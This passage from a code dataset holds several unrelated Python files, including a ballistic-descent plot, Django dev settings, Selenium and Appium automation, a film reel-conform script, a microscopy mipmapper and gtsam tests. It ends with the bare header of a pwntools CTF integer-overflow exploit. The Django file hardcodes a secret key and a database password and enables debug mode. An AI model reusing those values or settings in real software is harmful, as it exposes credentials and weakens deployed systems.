linewidth=2)\nax[1, 1].set_xlabel('Initial velocity Y [m/s]', fontsize=12)\nax[1, 1].set_ylabel('Descent time [s]', fontsize=12)\nax[1, 1].set_title('Descent time for varying initial vertical velocity', fontsize=14)\n\n# Get the five scenarios.\nAFP = AnnexFParms()\n\nprint(\"Ballistic descent computations\")\nprint(\"------------------------------\")\nprint(\"Class   Init horiz     From    Terminal   Impact     Impact     Distance   Descent    KE\")\nprint(\"          speed      altitude  velocity   speed      angle      traveled    time     impact\")\n\nfor c in range(5):\n    print(\"{:2d} m     {:3d} m/s     {:4d} m    {:3.0f} m/s    {:3.0f} m/s     {:1.0f} deg    {:4.0f} m     \"\n          \"{:4.1f} s   {:6.0f} kJ\".format(\n        AFP.CA_parms[c].wingspan, AFP.CA_parms[c].cruise_speed, AFP.CA_parms[c].ballistic_descent_altitude,\n        AFP.CA_parms[c].terminal_velocity, AFP.CA_parms[c].ballistic_impact_velocity,\n        AFP.CA_parms[c].ballistic_impact_angle, AFP.CA_parms[c].ballistic_distance,\n        AFP.CA_parms[c].ballistic_descent_time, AFP.CA_parms[c].ballistic_impact_KE / 1000))\n\nplt.show()\n","repo_name":"JARUS-QM/casex","sub_path":"casex/examples/example6_ballistic_descent.py","file_name":"example6_ballistic_descent.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"70530900600","text":"from __future__ import absolute_import\n\nfrom .base import *\nimport psycopg2.extensions\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'umu8tj3a&k_6zv69-(8w!xj32a64m$kaiu@76wj3!6vvr)1qv^'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.postgresql_psycopg2',\n        'HOST': 'localhost',\n        'NAME': 'ffooty',\n        'USER': 'postgres',\n        'PASSWORD': 'postgres101',\n        'OPTIONS': {'isolation_level': psycopg2.extensions.ISOLATION_LEVEL_READ_UNCOMMITTED}\n    }\n}\nDATABASE_OPTIONS = {\n    \"autocommit\": True,\n}\nDEFAULT_FILE_STORAGE = 'storage.handlers.DatabaseStorage'\n\n\n# Testing\n#SELENIUM_WEBDRIVER = 'firefox'\n#SELENIUM_WEBDRIVER = 'phantomjs'\n# LETTUCE_APPS = ('ffooty')\n#LETTUCE_TEST_SERVER = 'lettuce.django.server.DjangoServer'\nLETTUCE_SERVER_PORT = 8999\nLETTUCE_USE_TEST_DATABASE = True\n\n# from previous settings\n# ALLOWED_HOSTS = ['localhost', '127.0.0.1']\n\n\n","repo_name":"danj1974/ffooty","sub_path":"ffooty/settings/dan.py","file_name":"dan.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9919588370","text":"\"\"\"Program to count the number of pairs of repeated characters in a string\r\nMick Perring\r\n07 May 2014\"\"\"\r\n\r\nmessage = input(\"Enter a message:\\n\")   # user inputs message\r\nn = 0\r\nk = 0\r\n\r\ndef rep(message, k, n):   # rep function to check for and count pairs of repeated characters in string\r\n    check1 = k\r\n    check2 = k + 1\r\n    if check2 >= len(message):   # ends function running when whole string has been checked\r\n        print(\"Number of pairs:\", n)   # and prints count of pairs of repeated characters\r\n        return\r\n    \r\n    if message[check1] == message[check2]:   # adds to count if pair is found\r\n        n += 1\r\n        rep(message, k + 2, n)\r\n    \r\n    else:   # repeats function until string has been completely checked\r\n        rep(message, k + 1, n)\r\n    \r\nrep(message, k, 
n)","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/prrmic009/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2930812344","text":"import os\nimport time\nfrom pprint import pprint\n\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import Select\n\nBASE_DIR = os.path.dirname(__file__)\n\n# Create a new instance of the Google driver\nexecutable_path = os.path.join(BASE_DIR, 'drivers', 'chromedriver')\ndriver = WebDriver(executable_path=executable_path)\n\n# go to the google home page\ndriver.get('https://www.google.com')\n\n# find the element that's name attribute is lst-ib (the google search box)\nsearch = driver.find_element_by_id('lst-ib')\nsearch.send_keys('Hillsong')\nsearch.submit()\n\n# find the elements that's names attributes are r (the google search box)\nrelated_search = driver.find_elements_by_class_name('r')\n\n# running script from python with selenium to javascript\ndriver.execute_script(\"console.log('Hello from python to js')\")\n\n# search all the links that contain the word Church\nlinks = driver.find_elements_by_partial_link_text('Church')\npprint([item.text for item in links])\n\n# running javascript code to get all the search results\nlist_hillsong_search = driver.execute_script(\"return document.querySelectorAll('.r > a')\")\npprint([item.text for item in list_hillsong_search])\n\n# opening first link using selectors css\nsong_hillsong = driver.find_element_by_css_selector('.r a')\nsong_hillsong.click()\n\n\ndef enter_to_iframe_select_and_deselect_selectHTML():\n driver.get('https://www.w3schools.com/TAGs/tryit.asp?filename=tryhtml_select_multiple')\n\n driver.switch_to.frame(\"iframeResult\")\n select = Select(driver.execute_script(\"return document.querySelector('[name=cars]')\"))\n select.select_by_value(\"volvo\")\n\n time.sleep(2)\n select.deselect_all()\n\n time.sleep(10)\n driver.close()\n driver.quit()\n\n\n# closing driver and quiting\ndriver.close()\ndriver.quit()\n","repo_name":"oscles/Test-with-selenium-and-python","sub_path":"webdriver.py","file_name":"webdriver.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12610930675","text":"#!/bin/env python3\n\nimport argparse\nimport os\nimport subprocess\nimport sys\nfrom python.distant_vfx.filemaker import CloudServerWrapper\nfrom python.distant_vfx.constants import FMP_URL, FMP_USERNAME, FMP_PASSWORD, FMP_VFX_DB, FMP_SHOTS_LAYOUT, RV_PATH, \\\n SHOT_TREE_BASE_PATH\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('reel',\n type=int,\n action='store',\n help='Reel number to conform.')\n args = parser.parse_args()\n reel = args.reel\n\n # Find latest reel qt\n print('Finding latest reel QT...')\n reel_qt = _find_latest_reel_qt(reel)\n if not reel_qt:\n print(f'Could not find QT for reel {reel}.')\n else:\n print(f'Found reel QT: {reel_qt}')\n\n # Find shot records in filemaker\n print('Searching FileMaker database for shot records...')\n records = _get_reel_versions_from_filemaker(reel)\n if not records:\n print(f'No shot records found for reel {reel}.')\n sys.exit()\n else:\n print(f'Found records in reel {reel}.')\n\n # Filter records to those with in-cut versions\n print('Filtering records with in-cut versions...')\n in_cut_records = 
_filter_records_with_cut_in_version(records)\n if not in_cut_records:\n print('No records found with in-cut versions.')\n sys.exit()\n else:\n print(f'Found {len(in_cut_records)} records with in-cut versions.')\n\n # Find versions on disk\n path_tuples = []\n codec_type = 'h264'\n print(f'Finding {codec_type} versions on disk...')\n for version_tuple in in_cut_records:\n version, cut_in, duration = version_tuple\n path = _find_version_on_disk(version, codec_type=codec_type)\n if path:\n print(f'Found version {version} at path: {path}')\n path_tuple = (path, cut_in, duration)\n path_tuples.append(path_tuple)\n else:\n print(f'Could not find version {version} on disk.')\n\n # Build RV command\n print(f'Building RV command...')\n cmd = _build_rv_command(reel_qt, path_tuples)\n\n # Launch RV\n print(f'Launching files in RV...')\n _launch_rv(cmd)\n\n\ndef _launch_rv(cmd):\n process = subprocess.Popen(cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n universal_newlines=True,\n shell=False)\n stdout, stderr = process.communicate()\n\n\ndef _find_latest_reel_qt(reel_num):\n identifier = f'_r{reel_num}'\n reel_dir = '/mnt/Projects/dst/post/reference/reels'\n for file in os.listdir(reel_dir):\n if identifier in file:\n return os.path.join(reel_dir, file)\n return None\n\n\ndef _find_version_on_disk(version, codec_type='dnx'):\n shot = version[:7]\n seq = shot[:3]\n shot_dir = os.path.join(SHOT_TREE_BASE_PATH, seq, shot)\n shot_files = _find_files(shot_dir)\n for file in shot_files:\n ext = file.split('.')[-1]\n file_lower = file.lower()\n if codec_type in file_lower and ext == 'mov' and version.lower() in file_lower:\n return file\n return None\n\n\ndef _find_files(directory):\n for root, dirs, files in os.walk(directory):\n for file in files:\n yield os.path.join(root, file)\n\n\ndef _build_rv_command(reel_qt_path, version_path_cut_order_tuple_list):\n first_version_cut = version_path_cut_order_tuple_list[0][1]\n first_reel_arg = _construct_reel_qt_source_arg(reel_qt_path, cut_out=first_version_cut-1)\n cmd = [RV_PATH] + first_reel_arg\n\n list_len = len(version_path_cut_order_tuple_list)\n for index, version_tuple in enumerate(version_path_cut_order_tuple_list):\n path, cut_in, duration = version_tuple\n range_start = cut_in - 1\n cut_out = range_start + duration\n version_arg = _construct_version_qt_source_arg(path, range_start=range_start, cut_in=cut_in, cut_out=cut_out)\n cmd += version_arg\n\n if index == list_len - 1:\n last_reel_arg = _construct_reel_qt_source_arg(reel_qt_path, cut_in=cut_out+1)\n cmd += last_reel_arg\n break\n\n next_cut_in = version_path_cut_order_tuple_list[index + 1][1]\n if next_cut_in == cut_out + 1:\n continue\n else:\n # fill in gaps if needed with reel qt\n reel_arg = _construct_reel_qt_source_arg(reel_qt_path, cut_in=cut_out+1, cut_out=next_cut_in-1)\n cmd += reel_arg\n return cmd\n\n\ndef _construct_version_qt_source_arg(version_qt_path, range_start=None, cut_in=None, cut_out=None):\n arg = ['[', version_qt_path]\n if range_start:\n arg += ['-rs', str(range_start)]\n if cut_in:\n arg += ['-in', str(cut_in)]\n if cut_out:\n arg += ['-out', str(cut_out)]\n arg.append(']')\n return arg\n\n\ndef _construct_reel_qt_source_arg(reel_qt_path, cut_in=None, cut_out=None):\n arg = ['[', reel_qt_path]\n if cut_in:\n arg += ['-in', str(cut_in)]\n if cut_out:\n arg += ['-out', str(cut_out)]\n arg.append(']')\n return arg\n\n\ndef _filter_records_with_cut_in_version(records):\n record_cut_order_tuples = []\n for record in records:\n try:\n current_filename = 
record['CurrentFilename']\n assert current_filename\n cut_order = int(record['VFXEditorialShots::CutOrder'])\n duration = int(record['VFXEditorialShots::Duration'])\n record_cut_order_tuples.append((current_filename, cut_order, duration))\n except:\n pass\n return sorted(record_cut_order_tuples, key=lambda x: x[1]) # sort by cut order\n\n\ndef _get_reel_versions_from_filemaker(reel_num):\n with CloudServerWrapper(url=FMP_URL,\n user=FMP_USERNAME,\n password=FMP_PASSWORD,\n database=FMP_VFX_DB,\n layout=FMP_SHOTS_LAYOUT\n ) as fmp:\n fmp.login()\n\n query = {'VFXEditorialShots::Reel': str(reel_num)}\n records = fmp.find([query], limit=1000)\n return records\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"marklivolsi/distant-vfx","sub_path":"job_entry_points/reel_edit.py","file_name":"reel_edit.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"14936094196","text":"import copy\nimport datetime\nimport logging\nimport re\nimport xml.etree.ElementTree\n\nimport numpy as np\nimport renderapi\nimport skimage.transform\nimport tifffile\n\nfrom .mipmapper import Mipmapper\nfrom .render_specs import Axis, Tile\n\n# constants\nSECTION_DIR_PADDING = 3 # amount of digits in a section directory\nSECTION_DIR_GLOB = \"S\" + \"[0-9]\" * SECTION_DIR_PADDING\n# amount of digits in each coordinate on an image file name\nIMAGE_FILENAME_PADDING = 5\nTIFFILE_GLOB = (\n \"/tile-\"\n + \"[0-9]\" * IMAGE_FILENAME_PADDING\n + \"x\"\n + \"[0-9]\" * IMAGE_FILENAME_PADDING\n + \".tif\"\n)\nNOT_NUMBER_RX = re.compile(\"[^0-9]\")\n\n_rx_number_part = rf\"\\d{{{IMAGE_FILENAME_PADDING}}}\"\nTIFFILE_X_BY_Y_RX = re.compile(\n rf\"tile-(?P<x>{_rx_number_part})x(?P<y>{_rx_number_part})\"\n)\n# name of a directory mapped to the name of the stack for the EM data in it\nDIR_BY_DATATYPE = {\"CLEM-grid\": \"EM_lomag\", \"EM-grid\": \"EM_himag\"}\n\n# register the default namespace used in the OME image metadata xml, this is\n# needed for etree to export xmls without the long namespace on every key\nOME_NAMESPACE_URI = \"http://www.openmicroscopy.org/Schemas/OME/2012-06\"\nNAMESPACE = {\"\": OME_NAMESPACE_URI}\nxml.etree.ElementTree.register_namespace(\"\", OME_NAMESPACE_URI)\n\n\nclass CLEM_Mipmapper(Mipmapper):\n def create_mipmaps(self, args): # override\n file_path, section_name, zvalue, datatype_dir = args\n match = TIFFILE_X_BY_Y_RX.fullmatch(file_path.stem)\n x_by_y = int(match.group(\"x\")), int(match.group(\"y\"))\n tiles = []\n logging.debug(f\"reading {file_path}\")\n with tifffile.TiffFile(file_path) as tiff:\n if not tiff.pages:\n raise RuntimeError(f\"found empty tifffile: {file_path}\")\n\n # tiff files are saved in an approximation of the OME-TIFF format,\n # the metadata is saved as an OME-XML in the description of the\n # first tiff IFD\n metadata = tiff.pages[0].description\n root = xml.etree.ElementTree.fromstring(metadata)\n image_elements = root.findall(\"Image\", NAMESPACE)\n image_elements_by_name = {\n element.attrib[\"Name\"]: element for element in image_elements\n }\n instrument = root.find(\"Instrument\", NAMESPACE)\n detector_by_id = {}\n for detector in instrument.findall(\"Detector\", NAMESPACE):\n _, detector_id = detector.attrib[\"ID\"].split(\":\")\n detectorname = detector.attrib[\"Model\"]\n detector_by_id[detector_id] = detectorname\n\n for page in tiff.pages:\n tile = self.create_mipmap_from_page(\n page,\n x_by_y,\n root,\n image_elements_by_name,\n detector_by_id,\n 
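# datatype_dir selects the output stack name via DIR_BY_DATATYPE\n                    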
datatype_dir,\n file_path,\n section_name,\n zvalue,\n )\n tiles.append(tile)\n\n return tiles\n\n def create_mipmap_from_page(\n self,\n page,\n x_by_y,\n root,\n image_elements_by_name,\n detector_by_id,\n datatype_dir,\n file_path,\n section_name,\n zvalue,\n ):\n \"\"\"create mipmaps for a single page in the multipage tiffile\n\n page: tifffile.TiffPage to interpret\n x_by_y: x and y count as tuple\n root: metadata from this tifffile\n image_elements_by_name: dictionary of metadata for image elements\n detector_by_id: dictionary of detector names for ids\n datatype_dir: type of capture\n file_path: path of this tifffile\n section_name: name of this stack\n zvalue: z height of this section\n \"\"\"\n tags = page.tags\n channel = tags[\"PageName\"].value\n width, height = tags[\"ImageWidth\"].value, tags[\"ImageLength\"].value\n element = image_elements_by_name[channel]\n new_root = copy.copy(root)\n for other in image_elements_by_name.values():\n if other != element:\n new_root.remove(other)\n\n description = xml.etree.ElementTree.tostring(\n new_root,\n encoding=\"unicode\",\n xml_declaration=False,\n )\n # tifffile.OmeXml.validate(description)\n image = page.asarray()\n pixels = element.find(\"Pixels\", NAMESPACE)\n if channel == \"Secondary electrons\":\n name = DIR_BY_DATATYPE[datatype_dir]\n image = skimage.util.invert(image) # invert the SEM image\n intensity_clip = 1, 99\n elif (\n channel.startswith(\"Filtered colour \")\n and datatype_dir == \"CLEM-grid\"\n ):\n pixel_channel = pixels.find(\"Channel\", NAMESPACE)\n wavelength = pixel_channel.attrib[\"ExcitationWavelength\"]\n name = f\"exc_{wavelength}nm\"\n intensity_clip = 30, 99\n else:\n raise RuntimeError(\n f\"found unexpected channel '{channel}' in tifffile: \"\n f\"{file_path}\"\n )\n\n x_by_y_str = \"x\".join(\n [str(xy).zfill(IMAGE_FILENAME_PADDING) for xy in x_by_y]\n )\n output_dir = self.mipmap_path / name / section_name / x_by_y_str\n output_dir.mkdir(parents=True, exist_ok=self.clobber)\n pyramid = self.make_pyramid(output_dir, image, description)\n percentile = np.percentile(image, intensity_clip)\n\n # find instrument metadata\n # NOTE: in the layout metadata scopeId becomes temca and cameraId\n # becomes camera. 
getting modelname dynamically doesn't work because\n # the EM-grid doesn't have it!\n # instrument = root.find(\"Instrument\", NAMESPACE)\n # scope = instrument.find(\"Microscope\", NAMESPACE)\n # modelname = scope.attrib[\"Model\"]\n modelname = \"SECOM\"\n # this assumes each objective has an associated detector with that id,\n # the image only includes the objective id\n objective_settings = element.find(\"ObjectiveSettings\", NAMESPACE)\n _, objective_id = objective_settings.attrib[\"ID\"].split(\":\")\n try:\n detectorname = detector_by_id[objective_id]\n except KeyError as exc:\n raise RuntimeError(\n f\"could not find associated detector with objective \"\n f\"{objective_id}\"\n ) from exc\n\n timestr = element.find(\"AcquisitionDate\", NAMESPACE).text\n time = datetime.datetime.fromisoformat(timestr)\n plane = pixels.find(\"Plane\", NAMESPACE)\n\n tforms = []\n transform = element.find(\"Transform\", NAMESPACE)\n if transform is not None:\n # load transform from spec (often a rotation)\n model = renderapi.transform.AffineModel()\n model.M00 = transform.attrib[\"A00\"]\n model.M01 = transform.attrib[\"A01\"]\n model.M10 = transform.attrib[\"A10\"]\n model.M11 = transform.attrib[\"A11\"]\n model.B0 = transform.attrib[\"A02\"]\n model.B1 = transform.attrib[\"A12\"]\n model.load_M()\n tforms.append(model)\n\n XY = \"X\", \"Y\"\n # size per pixel in micrometers\n size = [float(pixels.attrib[\"PhysicalSize\" + xy]) for xy in XY]\n # scaling on y axis needed to align with an x scaled to 1\n x_size, y_size = size\n y_corrected = float(y_size / x_size)\n if y_corrected:\n tforms.append(renderapi.transform.AffineModel(M11=y_corrected))\n\n # invert y\n # tforms.append(renderapi.transform.AffineModel(M11=-1))\n\n # pixel count\n pixels = [int(pixels.attrib[\"Size\" + xy]) for xy in XY]\n # stage position\n # NOTE: even though the OME spec specifies this parameter in um it is\n # erroneously saved in meters\n position = [plane.attrib[\"Position\" + xy] for xy in XY]\n # NOTE: the y position needs to be inverted, the input data has origin\n # in the bottom left corner\n um_position = [ # convert to micrometers\n float(pos) * 1e6 * invert for pos, invert in zip(position, (1, -1))\n ]\n\n # calculate boundary box\n bbox = np.array([[0, 0], [0, pixels[1]], [pixels[0], 0], [*pixels]])\n for tform in tforms:\n bbox = tform.tform(bbox)\n\n mins = [min(*values) for values in zip(*bbox)]\n maxs = [max(*values) for values in zip(*bbox)]\n axes = [Axis(*item, x_size) for item in zip(mins, maxs, um_position)]\n\n # take the x pixel size only, transform is applied for scale difference\n layout = renderapi.tilespec.Layout(\n sectionId=f\"{section_name}\",\n scopeId=modelname,\n cameraId=detectorname,\n pixelsize=float(x_size),\n )\n layout.stageX, layout.stageY = [float(value) for value in um_position]\n layout.imageCol, layout.imageRow = x_by_y\n spec = renderapi.tilespec.TileSpec(\n imagePyramid=pyramid,\n layout=layout,\n width=width,\n height=height,\n tforms=tforms,\n )\n return Tile(name, zvalue, spec, time, axes, *percentile)\n\n def find_files(self): # override\n section_paths = [*sorted(self.project_path.glob(SECTION_DIR_GLOB))]\n if not section_paths:\n raise RuntimeError(f\"no files found at {self.project_path}\")\n\n logging.info(\n f\"reading {len(section_paths)} section\"\n f\"{'s' if len(section_paths) else ''} from {self.project_path} \"\n f\"using {self.parallel} threads\"\n )\n first_z = None\n for section_path in section_paths:\n try:\n zvalue = int(NOT_NUMBER_RX.sub(\"\", 
section_path.stem))\n except ValueError as exc:\n raise RuntimeError(\n f\"could not get z value from path {section_path}\"\n ) from exc\n\n if first_z is None:\n first_z = zvalue\n zvalue = 0\n else:\n zvalue -= first_z\n\n section_name = section_path.name\n for datatype_dir in DIR_BY_DATATYPE.keys():\n files = [*section_path.glob(datatype_dir + TIFFILE_GLOB)]\n for file_path in files:\n yield file_path, section_name, zvalue, datatype_dir\n","repo_name":"hoogenboom-group/scripted-render-pipeline","sub_path":"scripted_render_pipeline/importer/clem_mipmapper.py","file_name":"clem_mipmapper.py","file_ext":"py","file_size_in_byte":10363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11635512468","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\nsetuptools.setup(\n name='jfwEncoderDecoder', \n version='0.2.6',\n author=\"Altamash Abdul Rahim\",\n author_email=\"altamash.ar96@gmail.com\",\n description=\"Binary encoding/decoding package\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/heezes/jfw-encoding-decoding\",\n packages=setuptools.find_packages(),\n install_requires=[\"cstruct\", \"pyclibrary\"],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n ],\n )","repo_name":"heezes/jfw-encoding-decoding","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"99213502","text":"import math\nimport textwrap\nimport unittest\n\nfrom gtsam.utils.test_case import GtsamTestCase\n\nimport gtsam\nfrom gtsam import (DiscreteBayesNet, DiscreteConditional, DiscreteDistribution,\n DiscreteFactorGraph, DiscreteKeys, DiscreteValues, Ordering)\n\n# Some keys:\nAsia = (0, 2)\nSmoking = (4, 2)\nTuberculosis = (3, 2)\nLungCancer = (6, 2)\n\nBronchitis = (7, 2)\nEither = (5, 2)\nXRay = (2, 2)\nDyspnea = (1, 2)\n\n\nclass TestDiscreteBayesNet(GtsamTestCase):\n \"\"\"Tests for Discrete Bayes Nets.\"\"\"\n\n def test_constructor(self):\n \"\"\"Test constructing a Bayes net.\"\"\"\n\n bayesNet = DiscreteBayesNet()\n Parent, Child = (0, 2), (1, 2)\n empty = DiscreteKeys()\n prior = DiscreteConditional(Parent, empty, \"6/4\")\n bayesNet.add(prior)\n\n parents = DiscreteKeys()\n parents.push_back(Parent)\n conditional = DiscreteConditional(Child, parents, \"7/3 8/2\")\n bayesNet.add(conditional)\n\n # Check conversion to factor graph:\n fg = DiscreteFactorGraph(bayesNet)\n self.assertEqual(fg.size(), 2)\n self.assertEqual(fg.at(1).size(), 2)\n\n def test_Asia(self):\n \"\"\"Test full Asia example.\"\"\"\n\n asia = DiscreteBayesNet()\n asia.add(Asia, \"99/1\")\n asia.add(Smoking, \"50/50\")\n\n asia.add(Tuberculosis, [Asia], \"99/1 95/5\")\n asia.add(LungCancer, [Smoking], \"99/1 90/10\")\n asia.add(Bronchitis, [Smoking], \"70/30 40/60\")\n\n asia.add(Either, [Tuberculosis, LungCancer], \"F T T T\")\n\n asia.add(XRay, [Either], \"95/5 2/98\")\n asia.add(Dyspnea, [Either, Bronchitis], \"9/1 2/8 3/7 1/9\")\n\n # Convert to factor graph\n fg = DiscreteFactorGraph(asia)\n\n # Create solver and eliminate\n ordering = Ordering()\n for j in range(8):\n ordering.push_back(j)\n chordal = fg.eliminateSequential(ordering)\n expected2 = DiscreteDistribution(Bronchitis, \"11/9\")\n 
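# Eliminating in key order 0..7 leaves the Bronchitis marginal as the last\n        # conditional: odds 11/9, i.e. P(Bronchitis=0) = 0.55.\n        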
self.gtsamAssertEquals(chordal.at(7), expected2)\n\n # solve\n actualMPE = fg.optimize()\n expectedMPE = DiscreteValues()\n for key in [Asia, Dyspnea, XRay, Tuberculosis, Smoking, Either, LungCancer, Bronchitis]:\n expectedMPE[key[0]] = 0\n self.assertEqual(list(actualMPE.items()),\n list(expectedMPE.items()))\n\n # Check value for MPE is the same\n self.assertAlmostEqual(asia(actualMPE), fg(actualMPE))\n\n # add evidence, we were in Asia and we have dyspnea\n fg.add(Asia, \"0 1\")\n fg.add(Dyspnea, \"0 1\")\n\n # solve again, now with evidence\n actualMPE2 = fg.optimize()\n expectedMPE2 = DiscreteValues()\n for key in [XRay, Tuberculosis, Either, LungCancer]:\n expectedMPE2[key[0]] = 0\n for key in [Asia, Dyspnea, Smoking, Bronchitis]:\n expectedMPE2[key[0]] = 1\n self.assertEqual(list(actualMPE2.items()),\n list(expectedMPE2.items()))\n\n # now sample from it\n chordal2 = fg.eliminateSequential(ordering)\n actualSample = chordal2.sample()\n # TODO(kartikarcot): Resolve the len function issue. Probably\n # due to a use of initializer list which is not supported in CPP17\n # self.assertEqual(len(actualSample), 8)\n\n def test_fragment(self):\n \"\"\"Test evaluate/sampling/optimizing for Asia fragment.\"\"\"\n\n # Create a reverse-topologically sorted fragment:\n fragment = DiscreteBayesNet()\n fragment.add(Either, [Tuberculosis, LungCancer], \"F T T T\")\n fragment.add(Tuberculosis, [Asia], \"99/1 95/5\")\n fragment.add(LungCancer, [Smoking], \"99/1 90/10\")\n\n # Create assignment with missing values:\n given = DiscreteValues()\n for key in [Asia, Smoking]:\n given[key[0]] = 0\n\n # Now sample from fragment:\n values = fragment.sample(given)\n # TODO(kartikarcot): Resolve the len function issue. Probably\n # due to a use of initializer list which is not supported in CPP17\n # self.assertEqual(len(values), 5)\n\n for i in [0, 1, 2]:\n self.assertAlmostEqual(fragment.at(i).logProbability(values),\n math.log(fragment.at(i).evaluate(values)))\n self.assertAlmostEqual(fragment.logProbability(values),\n math.log(fragment.evaluate(values)))\n actual = fragment.sample(given)\n # TODO(kartikarcot): Resolve the len function issue. 
Probably\n # due to a use of initializer list which is not supported in CPP17\n # self.assertEqual(len(actual), 5)\n\n def test_dot(self):\n \"\"\"Check that dot works with position hints.\"\"\"\n fragment = DiscreteBayesNet()\n fragment.add(Either, [Tuberculosis, LungCancer], \"F T T T\")\n MyAsia = gtsam.symbol('a', 0), 2 # use a symbol!\n fragment.add(Tuberculosis, [MyAsia], \"99/1 95/5\")\n fragment.add(LungCancer, [Smoking], \"99/1 90/10\")\n\n # Make sure we can *update* position hints\n writer = gtsam.DotWriter()\n ph: dict = writer.positionHints\n ph['a'] = 2 # hint at symbol position\n writer.positionHints = ph\n\n # Check the output of dot\n actual = fragment.dot(writer=writer)\n expected_result = \"\"\"\\\n digraph {\n size=\"5,5\";\n\n var3[label=\"3\"];\n var4[label=\"4\"];\n var5[label=\"5\"];\n var6[label=\"6\"];\n var6989586621679009792[label=\"a0\", pos=\"0,2!\"];\n\n var4->var6\n var6989586621679009792->var3\n var3->var5\n var6->var5\n }\"\"\"\n self.assertEqual(actual, textwrap.dedent(expected_result))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"borglab/gtsam","sub_path":"python/gtsam/tests/test_DiscreteBayesNet.py","file_name":"test_DiscreteBayesNet.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":2201,"dataset":"github-code","pt":"40"} +{"seq_id":"12097283245","text":"from appium.webdriver.common.touch_action import TouchAction\n\n\nclass HomePage(object):\n MAIN_PROJECT_SCREEN = 'android:id/content'\n ITEMS = 'com.todoist:id/text'\n COMPLETE_TASK = 'com.todoist:id/menu_item_complete'\n CREATE_TASK = 'com.todoist:id/fab'\n TASK_INPUT_FIELD = 'android:id/message'\n CHANGE_VIEW_BUTTON = 'Change the current view'\n EXPAND_PROJECT_LIST = '//android.widget.ImageView[@content-desc=\"Expand/collapse\"][1]'\n CREATE_PROJECT = '//android.widget.ImageButton[@content-desc=\"Add\"])[1]'\n PROJECT_LIST = '//android.widget.RelativeLayout[@resource-id=\"android:id/content\"]' \\\n '/android.widget.TextView[@resource-id=\"com.todoist:id/name\"]'\n PROJECT_NAME_INPUT = 'com.todoist:id/name'\n\n def __init__(self, driver):\n self.driver = driver\n driver.implicitly_wait(5)\n\n def create_task(self, content):\n self.driver.find_element_by_id(self.CREATE_TASK).click()\n self.driver.find_element_by_id(self.TASK_INPUT_FIELD).send_keys(content)\n self.driver.press_keycode(66) # Enter\n self.driver.press_keycode(111) # Escape - to close the keyboard popup\n\n def complete_task(self, name):\n assert name in self.list_tasks()\n for task in self.driver.find_elements_by_id(self.ITEMS):\n if task.text == name:\n task.click()\n self.driver.find_element_by_id(self.COMPLETE_TASK).click()\n\n def click_task(self, name):\n assert name in self.list_tasks()\n for task in self.driver.find_elements_by_id(self.ITEMS):\n if task.text == name:\n task.click()\n\n def open_sidebar(self):\n self.driver.find_element_by_accessibility_id(self.CHANGE_VIEW_BUTTON).click()\n\n def expand_project_list(self):\n self.driver.find_element_by_xpath(self.EXPAND_PROJECT_LIST).click()\n\n def click_create_project(self):\n self.driver.find_element_by_xpath(self.CREATE_PROJECT).click()\n\n def type_new_project_name(self, name):\n self.driver.find_element_by_id(self.PROJECT_NAME_INPUT).send_keys(name)\n self.driver.press_keycode(66)\n\n def switch_project(self, name):\n assert name in self.list_projects(), \\\n \"%s is not in the available projects: %s\" % (name, str(self.list_projects()))\n for project in 
self.driver.find_elements_by_xpath(self.PROJECT_LIST):\n if project.text == name:\n project.click()\n\n def list_projects(self):\n self.open_sidebar()\n self.expand_project_list()\n projects = []\n for element in self.driver.find_elements_by_xpath(self.PROJECT_LIST):\n projects.append(element.text)\n return projects\n\n def list_tasks(self):\n tasks = []\n for task in self.driver.find_elements_by_id(self.ITEMS):\n tasks.append(task.text)\n return tasks\n\n def refresh(self):\n screen_size = self.driver.get_window_size()\n screen_width = screen_size.get('width')\n screen_height = screen_size.get('height')\n element = self.driver.find_element_by_id(self.MAIN_PROJECT_SCREEN)\n actions = TouchAction(self.driver)\n actions.press(element, int(screen_width / 2), int(screen_height * 0.2))\\\n .wait(500)\\\n .move_to(element, int(screen_width / 2), int(screen_height * 0.8))\\\n .release()\\\n .perform()\n","repo_name":"EugeneAbramchuk/Todoist","sub_path":"mobile/pages/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71294450361","text":"from pwn import *\nfrom z3 import *\n\n# --- Info ---\n# CTF: CybexCTF 2020\n# Date: -\n# Challenge: Integer Operations\n# Description: Multiple integer overflow techniques to get the flag\n# --- End Info 